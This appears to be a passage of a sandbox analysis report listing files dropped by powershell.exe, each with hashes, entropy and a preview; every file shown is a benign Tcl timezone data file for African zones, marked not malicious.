                                                                                                                                                                                                                              SHA-256:AB69948637416219A3D458777990FA4568BEBC89388884BBF129C0E1370A560B
                                                                                                                                                                                                                              SHA-512:C03E785D1E85292056BB0BDD8DF8326C5DFEB6070AB1C071E1032D14EA69C9DEBC57B2CC7852E35D31652187126CCF0009A6A5C32F9DBB75D56C705535DF05CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Dar_es_Salaam) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.829357904445218
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcRHKQ1BQDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DOrkDR
                                                                                                                                                                                                                              MD5:7981499F9430DC1636C9F834273E0B91
                                                                                                                                                                                                                              SHA1:1D63F8578420D56E4A5D9D0881FBEC015421E416
                                                                                                                                                                                                                              SHA-256:E7F7560CCD65D53C446ADAE7128A74D37E17DD0B907A2F2FD85322FB8707B497
                                                                                                                                                                                                                              SHA-512:3C3F7D78E9A0DE6E2950E1C305EA2DBC986754AE9FB10AC410685F30C39EC235F6F221393099C012E62EE5A7B4F1BED67C96B7B81E90BBA064BA9FE685FE4050
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Djibouti) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.850101792457859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcnKe2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dml2D4yn
                                                                                                                                                                                                                              MD5:44881E75AC32FA95FF6143066EF01B90
                                                                                                                                                                                                                              SHA1:A221619B4CDE8BE6A181E1F3869EAB665F2E98B8
                                                                                                                                                                                                                              SHA-256:FCF2DAD148F4D2951320EA99730C56D5EB43D505F37416BE4BAD265CE2902706
                                                                                                                                                                                                                              SHA-512:4FA67A5F84758366189F0FC4A7FA6C820BA083E1C56EA95D25D21A367F25F76261B7EB5631DFFEB20E095CFD64E770338773F76BD50D4CF6AE29AD3EDFCEC408
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Douala) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5235
                                                                                                                                                                                                                              Entropy (8bit):3.541189246992611
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+eCJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:+eqZSszBrlKcJC9k
                                                                                                                                                                                                                              MD5:956F5B51FA8BA2E954A0E59AAC8F3276
                                                                                                                                                                                                                              SHA1:AE35A8502E57EA6EE173E3B42509E4CAC73DA091
                                                                                                                                                                                                                              SHA-256:5FB102A95B3C004AAB8371840B1A04AC352F48FF9E9EAFDEAAF21960B0F3CAA6
                                                                                                                                                                                                                              SHA-512:19E7F2574E2B62DF68CC24737F6B94864B3D64B2472BC7D78E6AB5142A1DC1AB3B3700AB802129CB16AED4A4FED29E2B8A5593EE327ADF496255FE2FEF6A7023
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/El_Aaiun) {.. {-9223372036854775808 -3168 0 LMT}.. {-1136070432 -3600 0 -01}.. {198291600 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {1373162400 0 0 +00}.. {1376100000 3600 1 +00}.. {1382839200 0 0 +00}.. {1396144800 3600 1 +00}.. {1403920800 0 0 +00}.. {1406944800 3600 1 +00}.. {1414288800 0 0 +00}.. {1427594400 3600 1 +00}.. {1434247200 0 0 +00}.. {1437271200 3600 1 +00}.. {1445738400 0 0 +00}.. {1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.866631090752554
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcu5sp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dk4DBS
                                                                                                                                                                                                                              MD5:6C115220CF951FC2EE3C299F86935B6D
                                                                                                                                                                                                                              SHA1:A1CAB8C710BF20553AF45343118C1726CFE922B7
                                                                                                                                                                                                                              SHA-256:BC53A4D489F48F14C594C4B0E52079B34E043A5751BBC7DF254A560352243575
                                                                                                                                                                                                                              SHA-512:E87A4FD145B645DF034182CAD7F9D2BE5B2D9F3A17B6A9B6C84A0B3E846D92EC4C69DF2E85129B7A1AFBC0CCAAC8E3B1D47EB09F0900A82B908E9F6BF63B9736
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Freetown) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.899477454245453
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcHK0o/4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAV+4Dt
                                                                                                                                                                                                                              MD5:07222D8ED83CDC456B4D5D84C4BDE320
                                                                                                                                                                                                                              SHA1:2C657F461FA3F48D56C791AFE4AB7D2EAF45AF60
                                                                                                                                                                                                                              SHA-256:653AF88955C4418D973E2F8681A99552EB7BE95BCA64C736072F488462F7B373
                                                                                                                                                                                                                              SHA-512:3016D0636F401BD88BCD460F6A61782E7E8A2C32CE4ECB904C711DF414038A5818F0CA3D7FC671C5ABCE70647FC674A2EF9081C5289EBFD184B44885902E007A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Gaborone) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.884642061266759
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc0B5h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2Dlfh4Dt
                                                                                                                                                                                                                              MD5:8666DABE8D196ACD94A9691C592FAF4E
                                                                                                                                                                                                                              SHA1:9F7EE009DCEAACA79C6EAA6FC73015D595467919
                                                                                                                                                                                                                              SHA-256:06B82C524585192E0E8FC69DCC1CF86183A8C5EF404645DC413FCF3F8C16B0AB
                                                                                                                                                                                                                              SHA-512:AAA32FD1B01BFECDD0D1C9C1DF1163374DAFE094C75720EA4095C34F7EAE7DCB594D1A7F6A2A90FB43FF01020F7AEB48E92496E0EE2D039AF23076CD369DD2A7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Harare) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):309
                                                                                                                                                                                                                              Entropy (8bit):4.695542624694403
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DWbzDm2OHePoHvmmXsd//HF2d7d6VcF2d6KsYov:MB862DW7mdHePCvmmcZvF0cVcF/KsFv
                                                                                                                                                                                                                              MD5:F0E153FC9B978E30742ABC025CA45E02
                                                                                                                                                                                                                              SHA1:73D96F3188190DAC2453E6F18A1C683CECB9CDE3
                                                                                                                                                                                                                              SHA-256:5EEF6475E1312051037FCAE3354E32DC0910BE7A5116B71F8CCBE1CCA08D3F1C
                                                                                                                                                                                                                              SHA-512:E66F4B5FF18BAAD53AFB1ED36A0827115C793075A61F794F26F32BC9F6799DF816A1F817BEB0C0BC938F89E6F5BFBE1AB4F504F1AF518764103FB287746552C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Johannesburg) {.. {-9223372036854775808 6720 0 LMT}.. {-2458173120 5400 0 SAST}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {-829526400 10800 1 SAST}.. {-813805200 7200 0 SAST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1127
                                                                                                                                                                                                                              Entropy (8bit):4.027824722230131
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5mesdOkMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8M5:5YMV04MSHMzNxMbwM0JXMfCsMzaMq0QJ
                                                                                                                                                                                                                              MD5:32EC0589260D9D4BCC85FE91E6F04D00
                                                                                                                                                                                                                              SHA1:BAA269852C4AC6B89EA7941E7A75A007E0CF9EDF
                                                                                                                                                                                                                              SHA-256:F2646E15488ABF2E960759CEFE5705416E71DA71BB8407B26196244FD1A3394F
                                                                                                                                                                                                                              SHA-512:4F485453BE1D186ADBE0908852475C63C57BA498091C222EFFB9A5FEA2DB7F55E1BB2DBDBF6AC0F24CC67D47549FA3F5257655B5449B1BCF1FB5CDB27B03D501
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Juba) {.. {-9223372036854775808 7588 0 LMT}.. {-1230775588 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7200
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.837466713772859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcJEl2DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DIEl2V
                                                                                                                                                                                                                              MD5:E929ED1BC316C71AABE7E625BD562FB1
                                                                                                                                                                                                                              SHA1:C20C172518C02D93327F4BBBC5D410BFFEF5039D
                                                                                                                                                                                                                              SHA-256:8EA3028CE2B025F0C457DC8F7601279CA5AF565A88B9FE80208F9F1030F2B0D0
                                                                                                                                                                                                                              SHA-512:B2FBCF06EACCF18DE97AF1D6BC57D9638E0A36DBF17044FF97F6B9E5089CF9E13E1304F304495324C0ACC1128A7D2D494E7C1FDB95DB0855FCE54F7028096C50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Kampala) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1131
                                                                                                                                                                                                                              Entropy (8bit):4.0421745451318385
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5xe9dSXMV0GbMSHMzNy8MXLwM0JXMfCsMzaMq0QM3W50dM44R8M1XMreM7p0z8MM:5hMV04MSHMzNxMbwM0JXMfCsMzaMq0Qc
                                                                                                                                                                                                                              MD5:2BD3850DDBE2F05BF6F24F3AEFF7516C
                                                                                                                                                                                                                              SHA1:22B0DBB54E071F30D51A8654CF103F99537F74CD
                                                                                                                                                                                                                              SHA-256:F475DB8A857A46B310B12C21D6A9BC6CA9FF2960DA429A9D57FA375F9439E13B
                                                                                                                                                                                                                              SHA-512:1CF82FC07348C697F26625673DA7E3D734358B3FBE69D8E2132CAC0D9F00C7E8CDC353676CD9BAC4CBB9E26CF6638CEAE41DF559E7445D9C453409D7115FFC6C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Khartoum) {.. {-9223372036854775808 7808 0 LMT}.. {-1230775808 7200 0 CAT}.. {10360800 10800 1 CAST}.. {24786000 7200 0 CAT}.. {41810400 10800 1 CAST}.. {56322000 7200 0 CAT}.. {73432800 10800 1 CAST}.. {87944400 7200 0 CAT}.. {104882400 10800 1 CAST}.. {119480400 7200 0 CAT}.. {136332000 10800 1 CAST}.. {151016400 7200 0 CAT}.. {167781600 10800 1 CAST}.. {182552400 7200 0 CAT}.. {199231200 10800 1 CAST}.. {214174800 7200 0 CAT}.. {230680800 10800 1 CAST}.. {245710800 7200 0 CAT}.. {262735200 10800 1 CAST}.. {277246800 7200 0 CAT}.. {294184800 10800 1 CAST}.. {308782800 7200 0 CAT}.. {325634400 10800 1 CAST}.. {340405200 7200 0 CAT}.. {357084000 10800 1 CAST}.. {371941200 7200 0 CAT}.. {388533600 10800 1 CAST}.. {403477200 7200 0 CAT}.. {419983200 10800 1 CAST}.. {435013200 7200 0 CAT}.. {452037600 10800 1 CAST}.. {466635600 7
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.910322325134086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcCJRx+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DRX+DEi
                                                                                                                                                                                                                              MD5:3017253E1C6ACCA8D470A014E4BB321D
                                                                                                                                                                                                                              SHA1:671B7AC04580B56E2C34F88D123E8296947DDD7E
                                                                                                                                                                                                                              SHA-256:73FEB807006897B4B485CB82394867444E890265EFE960EC66D6C0E325DA9372
                                                                                                                                                                                                                              SHA-512:2498C380D761A16C183D78BC1BB18B1D2A1BFCB9C703D86A3FC04CCCE43D88C8D4BC3C47CC31639B78A5FE9C8A7445E9DBB52062E2F3B737DA1E7D0FF70F140A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Kigali) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.866127364448228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcqQFeDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DdD4yn
                                                                                                                                                                                                                              MD5:41209A335A99803239A854575190C5ED
                                                                                                                                                                                                                              SHA1:E6EA627C25513B9DDE053F9A24D509AA317C30A1
                                                                                                                                                                                                                              SHA-256:611375C4901AD6C4844C2BB7D02FB17F34996F49E642546A6784D6F0B28530CC
                                                                                                                                                                                                                              SHA-512:DF2C0B131F35F54DF5EBF7F8459F98DBABEB6F081247BA95B5D7B41146E2A2EF9BC6B1D909DE57A1223D9C258AB197D9668ED2E111A365C86BABDAA7DF551FB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Kinshasa) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                                              Entropy (8bit):4.7936510664790815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D4JDm2OHWQvvoHvBsp9boFvoHzIX7uRe6vF9:MB862DymdHWQCvqpmVCzIq
                                                                                                                                                                                                                              MD5:EC08046589E85D999A597252FF5368B7
                                                                                                                                                                                                                              SHA1:126E3DE158E1E7AF4737D0AB5B51C0F92F416DC7
                                                                                                                                                                                                                              SHA-256:DCC9F52F539A67DFD7ABAFDE072ACDAE2B67754C559C8A5FE61979F5A286A066
                                                                                                                                                                                                                              SHA-512:84B9AB18BC343C8B8934F5FDD2E2EB413925B04D6F5394AA8337B7B55E6487FB071A83A69BD4D0FA40F7F31EBC57B9908729674542CEA3083D700FCD02D77633
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Lagos) {.. {-9223372036854775808 815 0 LMT}.. {-2035584815 0 0 GMT}.. {-1940889600 815 0 LMT}.. {-1767226415 1800 0 +0030}.. {-1588465800 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.865878143076229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcr7bp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dgfp4D4y
                                                                                                                                                                                                                              MD5:35D8A58EE21E603C6FC4FB896AE6B3D0
                                                                                                                                                                                                                              SHA1:F1D0A939D761F3F0954F045814CF5339A5597036
                                                                                                                                                                                                                              SHA-256:AB3E797548C7663CF9ABA7FE163635FF7CAB9E6CB61FA1644C0F7B4B5CCE8B99
                                                                                                                                                                                                                              SHA-512:97717961987F6B6832C24A7833150CDFE7E82BBEB32DFDB84D2500442AAD9263F8BD4E879591E913D56E9A1991C389EF730211853647A889F358AE3FA37C0185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Libreville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.862780607964543
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcih4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DNh4D4
                                                                                                                                                                                                                              MD5:EA21ABBF8B11953916A1C509B8A1B427
                                                                                                                                                                                                                              SHA1:35ADC230C57B001BE8A99A3D2E34B609A60A1162
                                                                                                                                                                                                                              SHA-256:EACA9124F17E5B11F27D11FA6141D19EB3AC23E155E155B73467BDAA3BC99AA7
                                                                                                                                                                                                                              SHA-512:A7972D4F1C5FB988CA04B39E2CDD580F51383BA9D7A66C478275C11A07B8D7A6EFF53A3E1929B0D89F10BCC39D22F285DB2601ED60DB4647C65465643F70C137
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Lome) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.856982839546061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DccLtBQDcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DXQD4yn
                                                                                                                                                                                                                              MD5:40CD47F6DCF51EBEFEF42489F1716257
                                                                                                                                                                                                                              SHA1:DF245192A1899A72DE01A57F6969AC060E841734
                                                                                                                                                                                                                              SHA-256:4C2FD1E44DFAAF0C0DD2EB56B84B538F1E2D84B301AB2CFB8EE7759783501444
                                                                                                                                                                                                                              SHA-512:D39BEB0EEF344B1A44F7D6A806A1D5B956D7D402648EE0C67C4BA46493236840AF975D89A91B2D33B8AA7D6DC9A051E66718DCDBC1C83B0E964215C2E32ED923
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Luanda) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.940313336280723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcfpT0DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2D8pT0Dt
                                                                                                                                                                                                                              MD5:71A5DE1276902DB1542840318F9B1AF3
                                                                                                                                                                                                                              SHA1:AC3825BF343482E0E4D9D6FAA6FCA4D1A125433B
                                                                                                                                                                                                                              SHA-256:24384EEC359FD24D181AAEF3C017E3C345490A8D352B29D19B1B143A29A811C2
                                                                                                                                                                                                                              SHA-512:2984EB42A79B8B32BB93DFE71F1C4C0CABFDC9B0A199971347BB3473463FA07FDB5D20227D288BF8653B1BDE347E1297459BBB4C3C34AF7A5434FBF945683577
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lubumbashi) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.905174746463853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DcOf+DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkDEi
                                                                                                                                                                                                                              MD5:1D7FDB388535CC59742CA0F1AEE27FBD
                                                                                                                                                                                                                              SHA1:A99FF2CAC47FD333429C22B271E190D979EEC024
                                                                                                                                                                                                                              SHA-256:B00801A7279741434D9C2D7EC7322DD93B85EA4F5C9976AB3A43F0AB142E1553
                                                                                                                                                                                                                              SHA-512:0174D3C6F9116C36C62AD1EB58203EE7DFE8C37F618B8449D5E45AD6290CF8334F28798877D7A563A12EE533026244D6A49BCCF29B5D7FCB5BCC91481D0DDDE2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Lusaka) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.857096806490649
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcn2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D42D4yn
                                                                                                                                                                                                                              MD5:1CA9B3E7BCD5BC1CC881453D16B09389
                                                                                                                                                                                                                              SHA1:1B1964B314E72847D71A42C147CF2BF331B44461
                                                                                                                                                                                                                              SHA-256:35D56EFFE9E7E60F17B32BD30486E566B635F0AE7A8948D77395B8E6332E26F1
                                                                                                                                                                                                                              SHA-512:9E08D57B7824F5B076D159D9A5106E51450DF24729C36F485B9B68E8F47E8DFC50F9BEC3F11E0AE6579A8E372A5C0F0DA18A2E797CF2115519D1B4E5B64413DD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Malabo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
